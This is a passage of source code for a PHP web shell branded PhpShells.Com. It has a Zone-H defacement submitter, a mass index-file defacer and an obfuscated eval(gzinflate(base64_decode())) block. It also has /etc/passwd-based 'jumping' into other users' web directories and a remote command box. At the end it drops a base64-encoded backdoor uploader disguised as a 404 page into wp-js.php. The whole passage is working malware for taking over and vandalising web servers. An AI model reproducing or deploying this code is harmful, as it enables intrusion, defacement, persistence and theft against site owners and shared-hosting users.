\"defacer=\$nick&domain1=\$url&hackmode=1&reason=1&submit=Send\");\r\n\t\t\treturn curl_exec(\$ch);\r\n\t\t\t\t  curl_close(\$ch);\r\n\t\t}\r\n\t\tforeach(\$domain as \$url) {\r\n\t\t\t\$zoneh = zoneh(\$url,\$nick);\r\n\t\t\tif(preg_match(\"/color=\\\"red\\\">OK<\\/font><\\/li>/i\", \$zoneh)) {\r\n\t\t\t\techo \"\$url -> <font color=lime>OK</font><br>\";\r\n\t\t\t} else {\r\n\t\t\t\techo \"\$url -> <font color=red>ERROR</font><br>\";\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo \"<center><form method='post'>\r\n\t\t<u>Defacer</u>: <br>\r\n\t\t<input type='text' name='nick' size='50' value='KatiB'><br>\r\n\t\t<u>Domains</u>: <br>\r\n\t\t<textarea style='width: 450px; height: 150px;' name='url'></textarea><br>\r\n\t\t<input type='submit' name='submit' value='Submit' style='width: 450px;'>\r\n\t\t</form>\";\r\n\t}\r\n\techo \"</center>\";\r\n} elseif(\$_GET['to'] == 'mass') {\r\n\tfunction sabun_massal(\$dir,\$namafile,\$isi_script) {\r\n\t\tif(is_writable(\$dir)) {\r\n\t\t\t\$dira = scandir(\$dir);\r\n\t\t\tforeach(\$dira as \$dirb) {\r\n\t\t\t\t\$dirc = \"\$dir/\$dirb\";\r\n\t\t\t\t\$lokasi = \$dirc.'/'.\$namafile;\r\n\t\t\t\tif(\$dirb === '.') {\r\n\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t} elseif(\$dirb === '..') {\r\n\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir(\$dirc)) {\r\n\t\t\t\t\t\tif(is_writable(\$dirc)) {\r\n\t\t\t\t\t\t\techo \"[<font color=lime>DONE</font>] \$lokasi<br>\";\r\n\t\t\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t\t\t\t\$idx = sabun_massal(\$dirc,\$namafile,\$isi_script);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tfunction sabun_biasa(\$dir,\$namafile,\$isi_script) {\r\n\t\tif(is_writable(\$dir)) {\r\n\t\t\t\$dira = scandir(\$dir);\r\n\t\t\tforeach(\$dira as \$dirb) {\r\n\t\t\t\t\$dirc = \"\$dir/\$dirb\";\r\n\t\t\t\t\$lokasi = \$dirc.'/'.\$namafile;\r\n\t\t\t\tif(\$dirb === '.') {\r\n\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t} elseif(\$dirb === '..') {\r\n\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir(\$dirc)) {\r\n\t\t\t\t\t\tif(is_writable(\$dirc)) {\r\n\t\t\t\t\t\t\techo \"[<font color=lime>DONE</font>] \$dirb/\$namafile<br>\";\r\n\t\t\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif(\$_POST['start']) {\r\n\t\tif(\$_POST['tipe_sabun'] == 'mahal') {\r\n\t\t\techo \"<div style='margin: 5px auto; padding: 5px'>\";\r\n\t\t\tsabun_massal(\$_POST['d_dir'], \$_POST['d_file'], \$_POST['script']);\r\n\t\t\techo \"</div>\";\r\n\t\t} elseif(\$_POST['tipe_sabun'] == 'murah') {\r\n\t\t\techo \"<div style='margin: 5px auto; padding: 5px'>\";\r\n\t\t\tsabun_biasa(\$_POST['d_dir'], \$_POST['d_file'], \$_POST['script']);\r\n\t\t\techo \"</div>\";\r\n\t\t}\r\n\t} else {\r\n\techo \"<center>\";\r\n\techo \"<form method='post'>\r\n\t<font style='text-decoration: underline;'>Mass Type</font><br>\r\n\t<input type='radio' name='tipe_sabun' value='murah' checked>Single<input type='radio' name='tipe_sabun' value='mahal'>Multi<br>\r\n\t<font style='text-decoration: underline;'>Folder:</font><br>\r\n\t<input type='text' name='d_dir' value='\$dir' style='width: 450px;' height='10'><br>\r\n\t<font style='text-decoration: underline;'>Filename:</font><br>\r\n\t<input type='text' name='d_file' value='phpshells.html' style='width: 450px;' height='10'><br>\r\n\t<font style='text-decoration: underline;'>Index File:</font><br>\r\n\t<textarea name='script' style='width: 450px; height: 200px;'>Hacked By PhpShells.Com</textarea><br>\r\n\t<input type='submit' name='start' value='START!' style='width: 450px;'>\r\n\t</form></center>\";\r\n\t} \r\n\t}elseif(\$_GET['to'] == 'sym') {\r\necho '<hr>';\r\neval(gzinflate(base64_decode('7Vf/T9tGFP89Uv6H1yOT7ZHaSRBrReKUrjCt0lakAtskqCLHPmOPi8+6u2BSyv++d+fYpE4AlVbaJhWJyHnf/b583ksnnjMGPkglJoLmLAip3ZkcH77/4/D9mXVw9Ob098N3J5P3R0cn1ocuENKFTh6oxBm2W52oNwvSTKL6fpwyahOPqtDLghmN3JBnMdFSW1uJUmhWtltpbFc6zk27tT+7jFJhk4iGwWIiFzPS7b148UIr7YdJg2Wo9JqGNmEZPJfggeBcGXpHe9/BMKyjXKUcI3qbRSgr4RfOGC+OF7Pf0uwSIzhIBQ0VFwsjAMa8m6hZu/U6ik4WOQVFr5WHeUgzcPMkB8P5NcgiRkWT2W4dByqV8QJeZwvLBJLrMGKe08y20HAQ4otLq2sVVhloYfiFSBXmGaW7ZezOcD8OGZclUYvSMOFA2q2RCqaMQsDSi8wPaaYwjCkXERX+DlZtwahvFWmkkr2fej8MS87zkDMu9rZe/tzDv6E11maE+Yw+szQexTxTYMR9ls4oyPQj9QfjYxfecXfkafZ45KnoS5QPuCnxE7VPJRVP1cVCMyx0Q9vDdyemX0M+Rz0f+vgt5oIGYVJ3JAQSls+6ObFXqaAXqU0+8oySbsVybnIkT2aBCpNJwJhtbWkBILb7o0O2rG5lRD+UidDljNlcJrZ+QsM4bAwbRIl0ZldCZ/0PZ70PjgNjGGj/nTnmAUPNuUyvJxdU5cU8jWwzaLzIqFhO2xUmJpBUesRtmqq7CIvfyB8mpszhMnEEXKjS46LCPelnNEZqAImgsY9jne95XlEUbtO3S7yqRiyQ0lfXarwuU3sJVjxpOf3qZ5bGEcuI1bzKtdXRsOXV6OBpKPASPqPemrqXz6csDSc45cwCFQjMpW9NpizILq21KJsdtAxt2UOwWshlvra3h7e3t3WqPTOvpt9uKZNUl/Lk8PjELyHSMkXL0V0RWWU7gG0EnoSI/3VAhMcQER6AROQ2UREqWIQHcLE/LtEO7sEN0/M7GzHuEZUN2PSYk3VEqvEIPgckMO9dJ4usdApuXSKIA1wAvU6VTU4z8/aKg5YFrfjMVB6KRLfZs5hyXLaa7ujGgo7e0jG2vlxSjUODYlSzAiGChV1SdUB3IIcte+4huL1yzvfOPU9qhJPdWrdpaPWQIOVEdvFqqCRw9o3GHQrWhhD5+gP49AnWGL4PPc24c+MDmaYZWSPqlP3V73uxXOddBcJj6dTL7mMGIi80aTP3gucJFes8uTEQYy+arTPmEk0hNN0TQ6zyzW+VbWJoDcTfzQxzhxEHk423mEqzOb0bID0gDzXuho3wYLevwLzWq0KpFMmq50cMVBj/AMQ3XKwi/BrA1wMY3DN9Gr9rlKkmownmJZTr+5VLeIYJ/jPNIl5I4tzci9mbEFtfsGt4fYfW6PkLAbvXe/kNoLrd+mqwfgCpq0Ing2WZrcsBYzs70aAuDxxTcUXFyEsG428C7m8P/lVgV3SWY6IIGXbwQOvjY888DTTW65schfAAtZfskQ+GW37d3nbgpoPXnv5h1bj/jMASQfFwQJJTOnN9+JunWLY9q2vILjnPsHGrSlijqfDG1rAKrTw+9ZdlA+4i0URllo+iUrk4jgjeRblY4nxeLY/d7lJRk1dGZxdNray0ap9tsvpV+2x9mX2bTfZ9jX1fY//nNdYYxw2bbORF6RV+LoMmw3mmza5MplG6Bb3v4E59EwK+CbKM4yvjz2hFoYmHtQdtrvx/Nf4H\r\n\r\n')));\r\n} elseif(\$_GET['to'] == 'jumping') {\r\n\t\$i = 0;\r\n\techo \"<div class='margin: 5px auto;'>\";\r\n\tif(preg_match(\"/hsphere/\", \$dir)) {\r\n\t\t\$urls = explode(\"\\r\\n\", \$_POST['url']);\r\n\t\tif(isset(\$_POST['jump'])) {\r\n\t\t\techo \"<pre>\";\r\n\t\t\tforeach(\$urls as \$url) {\r\n\t\t\t\t\$url = str_replace(array(\"http://\",\"www.\"), \"\", strtolower(\$url));\r\n\t\t\t\t\$etc = \"/etc/passwd\";\r\n\t\t\t\t\$f = fopen(\$etc,\"r\");\r\n\t\t\t\twhile(\$gets = fgets(\$f)) {\r\n\t\t\t\t\t\$pecah = explode(\":\", \$gets);\r\n\t\t\t\t\t\$user = \$pecah[0];\r\n\t\t\t\t\t\$dir_user = \"/hsphere/local/home/\$user\";\r\n\t\t\t\t\tif(is_dir(\$dir_user) === true) {\r\n\t\t\t\t\t\t\$url_user = \$dir_user.\"/\".\$url;\r\n\t\t\t\t\t\tif(is_readable(\$url_user)) {\r\n\t\t\t\t\t\t\t\$i++;\r\n\t\t\t\t\t\t\t\$jrw = \"[<font color=lime>R</font>] <a href='?dir=\$url_user'><font color=gold>\$url_user</font></a>\";\r\n\t\t\t\t\t\t\tif(is_writable(\$url_user)) {\r\n\t\t\t\t\t\t\t\t\$jrw = \"[<font color=lime>RW</font>] <a href='?dir=\$url_user'><font color=gold>\$url_user</font></a>\";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo \$jrw.\"<br>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tif(\$i == 0) { \r\n\t\t} else {\r\n\t\t\techo \"<br>Total ada \".\$i.\" Kamar di \".\$ip;\r\n\t\t}\r\n\t\techo \"</pre>\";\r\n\t\t} else {\r\n\t\t\techo '<center>\r\n\t\t\t\t  <form method=\"post\">\r\n\t\t\t\t  List Domains: <br>\r\n\t\t\t\t  <textarea name=\"url\" style=\"width: 500px; height: 250px;\">';\r\n\t\t\t\$fp = fopen(\"/hsphere/local/config/httpd/sites/sites.txt\",\"r\");\r\n\t\t\twhile(\$getss = fgets(\$fp)) {\r\n\t\t\t\techo \$getss;\r\n\t\t\t}\r\n\t\t\techo  '</textarea><br>\r\n\t\t\t\t  <input type=\"submit\" value=\"Jumping\" name=\"jump\" style=\"width: 500px; height: 25px;\">\r\n\t\t\t\t  </form></center>';\r\n\t\t}\r\n\t} elseif(preg_match(\"/vhosts|vhost/\", \$dir)) {\r\n\t\tpreg_match(\"/\\/var\\/www\\/(.*?)\\//\", \$dir, \$vh);\r\n\t\t\$urls = explode(\"\\r\\n\", \$_POST['url']);\r\n\t\tif(isset(\$_POST['jump'])) {\r\n\t\t\techo \"<pre>\";\r\n\t\t\tforeach(\$urls as \$url) {\r\n\t\t\t\t\$url = str_replace(\"www.\", \"\", \$url);\r\n\t\t\t\t\$web_vh = \"/var/www/\".\$vh[1].\"/\$url/httpdocs\";\r\n\t\t\t\tif(is_dir(\$web_vh) === true) {\r\n\t\t\t\t\tif(is_readable(\$web_vh)) {\r\n\t\t\t\t\t\t\$i++;\r\n\t\t\t\t\t\t\$jrw = \"[<font color=lime>R</font>] <a href='?dir=\$web_vh'><font color=gold>\$web_vh</font></a>\";\r\n\t\t\t\t\t\tif(is_writable(\$web_vh)) {\r\n\t\t\t\t\t\t\t\$jrw = \"[<font color=lime>RW</font>] <a href='?dir=\$web_vh'><font color=gold>\$web_vh</font></a>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\techo \$jrw.\"<br>\";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tif(\$i == 0) { \r\n\t\t} else {\r\n\t\t\techo \"<br>Total ada \".\$i.\" Kamar di \".\$ip;\r\n\t\t}\r\n\t\techo \"</pre>\";\r\n\t\t} else {\r\n\t\t\techo '<center>\r\n\t\t\t\t  <form method=\"post\">\r\n\t\t\t\t  List Domains: <br>\r\n\t\t\t\t  <textarea name=\"url\" style=\"width: 500px; height: 250px;\">';\r\n\t\t\t\t  bing(\"ip:\$ip\");\r\n\t\t\techo  '</textarea><br>\r\n\t\t\t\t  <input type=\"submit\" value=\"Jumping\" name=\"jump\" style=\"width: 500px; height: 25px;\">\r\n\t\t\t\t  </form></center>';\r\n\t\t}\r\n\t} else {\r\n\t\techo \"<pre>\";\r\n\t\t\$etc = fopen(\"/etc/passwd\", \"r\") or die(\"<font color=red>Can't read /etc/passwd</font>\");\r\n\t\twhile(\$passwd = fgets(\$etc)) {\r\n\t\t\tif(\$passwd == '' || !\$etc) {\r\n\t\t\t\techo \"<font color=red>Can't read /etc/passwd</font>\";\r\n\t\t\t} else {\r\n\t\t\t\tpreg_match_all('/(.*?):x:/', \$passwd, \$user_jumping);\r\n\t\t\t\tforeach(\$user_jumping[1] as \$user_idx_jump) {\r\n\t\t\t\t\t\$user_jumping_dir = \"/home/\$user_idx_jump/public_html\";\r\n\t\t\t\t\tif(is_readable(\$user_jumping_dir)) {\r\n\t\t\t\t\t\t\$i++;\r\n\t\t\t\t\t\t\$jrw = \"[<font color=lime>R</font>] <a href='?dir=\$user_jumping_dir'><font color=gold>\$user_jumping_dir</font></a>\";\r\n\t\t\t\t\t\tif(is_writable(\$user_jumping_dir)) {\r\n\t\t\t\t\t\t\t\$jrw = \"[<font color=lime>RW</font>] <a href='?dir=\$user_jumping_dir'><font color=gold>\$user_jumping_dir</font></a>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\techo \$jrw;\r\n\t\t\t\t\t\tif(function_exists('posix_getpwuid')) {\r\n\t\t\t\t\t\t\t\$domain_jump = file_get_contents(\"/etc/named.conf\");\t\r\n\t\t\t\t\t\t\tif(\$domain_jump == '') {\r\n\t\t\t\t\t\t\t\techo \" => ( <font color=red>Domain adi bulunamadi</font> )<br>\";\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\tpreg_match_all(\"#/var/named/(.*?).db#\", \$domain_jump, \$domains_jump);\r\n\t\t\t\t\t\t\t\tforeach(\$domains_jump[1] as \$dj) {\r\n\t\t\t\t\t\t\t\t\t\$user_jumping_url = posix_getpwuid(@fileowner(\"/etc/valiases/\$dj\"));\r\n\t\t\t\t\t\t\t\t\t\$user_jumping_url = \$user_jumping_url['name'];\r\n\t\t\t\t\t\t\t\t\tif(\$user_jumping_url == \$user_idx_jump) {\r\n\t\t\t\t\t\t\t\t\t\techo \" => ( <u>\$dj</u> )<br>\";\r\n\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\techo \"<br>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif(\$i == 0) { \r\n\t\t} else {\r\n\t\t\techo \"<br>Total ip \".\$i.\" Bulundu \".\$ip;\r\n\t\t}\r\n\t\techo \"</pre>\";\r\n\t}\r\n\techo \"</div>\";\r\n}  elseif(\$_GET['to'] == 'cmd') {\r\n\techo \"<form method='post'>\r\n\t<font style='text-decoration: underline;'>\".\$user.\"@\".\$ip.\": ~ \$ </font>\r\n\t<input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>\r\n\t</form>\";\r\n\tif(\$_POST['do_cmd']) {\r\n\t\techo \"<pre>\".exe(\$_POST['cmd']).\"</pre>\";\r\n\t}\r\n}\r\necho '<form enctype=\"multipart/form-data\" method=\"POST\">\r\n<font color=\"white\">File Upload :</font> <input type=\"file\" name=\"file\" />\r\n<input type=\"submit\" value=\"Yukle\" />\r\n</form>\r\n</td></tr>';\r\nif(isset(\$_GET['filesrc'])){\r\necho \"<tr><td>Current File : \";\r\necho \$_GET['filesrc'];\r\necho '</tr></td></table><br />';\r\necho('<pre>'.htmlspecialchars(file_get_contents(\$_GET['filesrc'])).'</pre>');\r\n}elseif(isset(\$_GET['option']) && \$_POST['opt'] != 'delete'){\r\necho '</table><br /><center>'.\$_POST['path'].'<br /><br />';\r\nif(\$_POST['opt'] == 'chmod'){\r\nif(isset(\$_POST['perm'])){\r\nif(chmod(\$_POST['path'],\$_POST['perm'])){\r\necho '<font color=\"green\">Change Permission Berhasil</font><br/>';\r\n}else{\r\necho '<font color=\"red\">Change Permission Gagal</font><br />';\r\n}\r\n}\r\necho '<form method=\"POST\">\r\nPermission : <input name=\"perm\" type=\"text\" size=\"4\" value=\"'.substr(sprintf('%o', fileperms(\$_POST['path'])), -4).'\" />\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">\r\n<input type=\"hidden\" name=\"opt\" value=\"chmod\">\r\n<input type=\"submit\" value=\"Go\" />\r\n</form>';\r\n}elseif(\$_POST['opt'] == 'rename'){\r\nif(isset(\$_POST['newname'])){\r\nif(rename(\$_POST['path'],\$path.'/'.\$_POST['newname'])){\r\necho '<font color=\"green\">Changed</font><br/>';\r\n}else{\r\necho '<font color=\"red\">Failed</font><br />';\r\n}\r\n\$_POST['name'] = \$_POST['newname'];\r\n}\r\necho '<form method=\"POST\">\r\nNew Name: <input name=\"newname\" type=\"text\" size=\"20\" value=\"'.\$_POST['name'].'\" />\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">\r\n<input type=\"hidden\" name=\"opt\" value=\"rename\">\r\n<input type=\"submit\" value=\"Change it\" />\r\n</form>';\r\n}elseif(\$_POST['opt'] == 'edit'){\r\nif(isset(\$_POST['src'])){\r\n\$fp = fopen(\$_POST['path'],'w');\r\nif(fwrite(\$fp,\$_POST['src'])){\r\necho '<font color=\"green\">Successful</font><br/>';\r\n}else{\r\necho '<font color=\"red\">Failed</font><br/>';\r\n}\r\nfclose(\$fp);\r\n}\r\necho '<form method=\"POST\">\r\n<textarea cols=80 rows=20 name=\"src\">'.htmlspecialchars(file_get_contents(\$_POST['path'])).'</textarea><br />\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">\r\n<input type=\"hidden\" name=\"opt\" value=\"edit\">\r\n<input type=\"submit\" value=\"Save\" />\r\n</form>';\r\n}\r\necho '</center>';\r\n}else{\r\necho '</table><br/><center>';\r\nif(isset(\$_GET['option']) && \$_POST['opt'] == 'delete'){\r\nif(\$_POST['type'] == 'dir'){\r\nif(rmdir(\$_POST['path'])){\r\necho '<font color=\"green\">Directory Deleted</font><br/>';\r\n}else{\r\necho '<font color=\"red\">Directory is not deleted                                                                                                                                                                                                                                                                                            </font><br/>';\r\n}\r\n}elseif(\$_POST['type'] == 'file'){\r\nif(unlink(\$_POST['path'])){\r\necho '<font color=\"green\">File Deleted</font><br/>';\r\n}else{\r\necho '<font color=\"red\">File is not deleted</font><br/>';\r\n}\r\n}\r\n}\r\necho '</center>';\r\n\$scandir = scandir(\$path);\r\necho '<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr class=\"first\">\r\n<td><center>Name</peller></center></td>\r\n<td><center>Size</peller></center></td>\r\n<td><center>Permission</peller></center></td>\r\n<td><center>Modify</peller></center></td>\r\n</tr>';\r\n\r\nforeach(\$scandir as \$dir){\r\nif(!is_dir(\$path.'/'.\$dir) || \$dir == '.' || \$dir == '..') continue;\r\necho '<tr>\r\n<td><a href=\"?path='.\$path.'/'.\$dir.'\">'.\$dir.'</a></td>\r\n<td><center>--</center></td>\r\n<td><center>';\r\nif(is_writable(\$path.'/'.\$dir)) echo '<font color=\"green\">';\r\nelseif(!is_readable(\$path.'/'.\$dir)) echo '<font color=\"red\">';\r\necho perms(\$path.'/'.\$dir);\r\nif(is_writable(\$path.'/'.\$dir) || !is_readable(\$path.'/'.\$dir)) echo '</font>';\r\n\r\necho '</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path='.\$path.'\">\r\n<select name=\"opt\">\r\n<option value=\"\">Select</option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n<input type=\"hidden\" name=\"name\" value=\"'.\$dir.'\">\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$path.'/'.\$dir.'\">\r\n<input type=\"submit\" value=\">\">\r\n</form></center></td>\r\n</tr>';\r\n}\r\necho '<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>';\r\nforeach(\$scandir as \$file){\r\nif(!is_file(\$path.'/'.\$file)) continue;\r\n\$size = filesize(\$path.'/'.\$file)/1024;\r\n\$size = round(\$size,3);\r\nif(\$size >= 1024){\r\n\$size = round(\$size/1024,2).' MB';\r\n}else{\r\n\$size = \$size.' KB';\r\n}\r\n\r\necho '<tr>\r\n<td><a href=\"?filesrc='.\$path.'/'.\$file.'&path='.\$path.'\">'.\$file.'</a></td>\r\n<td><center>'.\$size.'</center></td>\r\n<td><center>';\r\nif(is_writable(\$path.'/'.\$file)) echo '<font color=\"green\">';\r\nelseif(!is_readable(\$path.'/'.\$file)) echo '<font color=\"red\">';\r\necho perms(\$path.'/'.\$file);\r\nif(is_writable(\$path.'/'.\$file) || !is_readable(\$path.'/'.\$file)) echo '</font>';\r\necho '</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path='.\$path.'\">\r\n<select name=\"opt\">\r\n<option value=\"\">Select</option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n<option value=\"edit\">Edit</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"file\">\r\n<input type=\"hidden\" name=\"name\" value=\"'.\$file.'\">\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$path.'/'.\$file.'\">\r\n<input type=\"submit\" value=\">\">\r\n</form></center></td>\r\n</tr>';\r\n}\r\necho '</table>\r\n</div>';\r\n}\r\necho '<center><br/> -= Katib | PhpShells.Com =-</center>\r\n</body>\r\n</html>';\r\nfunction perms(\$file){\r\n\$perms = fileperms(\$file);\r\n\r\nif ((\$perms & 0xC000) == 0xC000) {\r\n// Socket\r\n\$info = 's';\r\n} elseif ((\$perms & 0xA000) == 0xA000) {\r\n// Symbolic Link\r\n\$info = 'l';\r\n} elseif ((\$perms & 0x8000) == 0x8000) {\r\n// Regular\r\n\$info = '-';\r\n} elseif ((\$perms & 0x6000) == 0x6000) {\r\n// Block special\r\n\$info = 'b';\r\n} elseif ((\$perms & 0x4000) == 0x4000) {\r\n// Directory\r\n\$info = 'd';\r\n} elseif ((\$perms & 0x2000) == 0x2000) {\r\n// Character special\r\n\$info = 'c';\r\n} elseif ((\$perms & 0x1000) == 0x1000) {\r\n// FIFO pipe\r\n\$info = 'p';\r\n} else {\r\n// Unknown\r\n\$info = 'u';\r\n}\r\n\r\n// Owner\r\n\$info .= ((\$perms & 0x0100) ? 'r' : '-');\r\n\$info .= ((\$perms & 0x0080) ? 'w' : '-');\r\n\$info .= ((\$perms & 0x0040) ?\r\n((\$perms & 0x0800) ? 's' : 'x' ) :\r\n((\$perms & 0x0800) ? 'S' : '-'));\r\n\r\n// Group\r\n\$info .= ((\$perms & 0x0020) ? 'r' : '-');\r\n\$info .= ((\$perms & 0x0010) ? 'w' : '-');\r\n\$info .= ((\$perms & 0x0008) ?\r\n((\$perms & 0x0400) ? 's' : 'x' ) :\r\n((\$perms & 0x0400) ? 'S' : '-'));\r\n\r\n// World\r\n\$info .= ((\$perms & 0x0004) ? 'r' : '-');\r\n\$info .= ((\$perms & 0x0002) ? 'w' : '-');\r\n\$info .= ((\$perms & 0x0001) ?\r\n((\$perms & 0x0200) ? 't' : 'x' ) :\r\n((\$perms & 0x0200) ? 'T' : '-'));\r\n\r\nreturn \$info;\r\n}\r\n\r\n { function zip() { \$zip1 = \"PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+PGhlYWQ+Cjx0aXRsZT40MDQgTm90IEZvdW5kPC90aXRsZT4KPC9oZWFkPjxib2R5Pgo8aDE+Tm90IEZvdW5kPC9oMT4KPHA+VGhlIHJlcXVlc3RlZCBVUkwgL2Vhc2Qgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+CjwvYm9keT48L2h0bWw+Cjw/cGhwCmlmKGlzc2V0KCRfR0VUWyJwaHBzaGVsbHMiXSkpewogIGVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7CiAgZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7CiAgaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgewogICRmaWxlID0gJF9GSUxFU1snZmlsZSddWyduYW1lJ107CiAgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsKICAkemlwID0gbmV3IFppcEFyY2hpdmU7CiAgaWYgKCR6aXAtPm9wZW4oJGZpbGUpID09PSBUUlVFKSB7CiAgICAgJHppcC0+ZXh0cmFjdFRvKCcuLycpOwogICAgICR6aXAtPmNsb3NlKCk7CiAgZWNobyAnWcO8a2xlbWUgQmHFn2FyxLFsxLEnOwogIH0gZWxzZSB7CiAgZWNobyAnWcO8a2xlbm1lZGkuJzsKICB9CiAgfWVsc2V7CiAgZWNobyAnPGI+QmFzYXJpc2l6PC9iPjxicj48YnI+JzsKICB9CiAgfQp9Cj8+\"; \r\n\$file = fopen(\"wp-js.php\", \"w+\"); \$write = fwrite(\$file, base64_decode(\$zip1)); fclose(\$file); } function zip1() { \$zip1 = \"PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+PGhlYWQ+Cjx0aXRsZT40MDQgTm90IEZvdW5kPC90aXRsZT4KPC9oZWFkPjxib2R5Pgo8aDE+Tm90IEZvdW5kPC9oMT4KPHA+VGhlIHJlcXVlc3RlZCBVUkwgL2Vhc2Qgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+CjwvYm9keT48L2h0bWw+Cjw/cGhwCmlmKGlzc2V0KCRfR0VUWyJwaHBzaGVsbHMiXSkpewogIGVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7CiAgZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7CiAgaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgewogICRmaWxlID0gJF9GSUxFU1snZmlsZSddWyduYW1lJ107CiAgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsKICAkemlwID0gbmV3IFppcEFyY2hpdmU7CiAgaWYgKCR6aXAtPm9wZW4oJGZpbGUpID09PSBUUlVFKSB7CiAgICAgJHppcC0+ZXh0cmFjdFRvKCcuLycpOwogICAgICR6aXAtPmNsb3NlKCk7CiAgZWNobyAnWcO8a2xlbWUgQmHFn2FyxLFsxLEnOwogIH0gZWxzZSB7CiAgZWNobyAnWcO8a2xlbm1lZGkuJzsKICB9CiAgfWVsc2V7CiAgZWNobyAnPGI+QmFzYXJpc2l6PC9iPjxicj48YnI+JzsKICB9CiAgfQp9Cj8+\"; \$file = fopen(\"../wp-js.php\", \"w+\"); \$write = fwrite(\$file, base64_decode(\$zip1)); fclose(\$file); } function zip2() { \$zip1 = 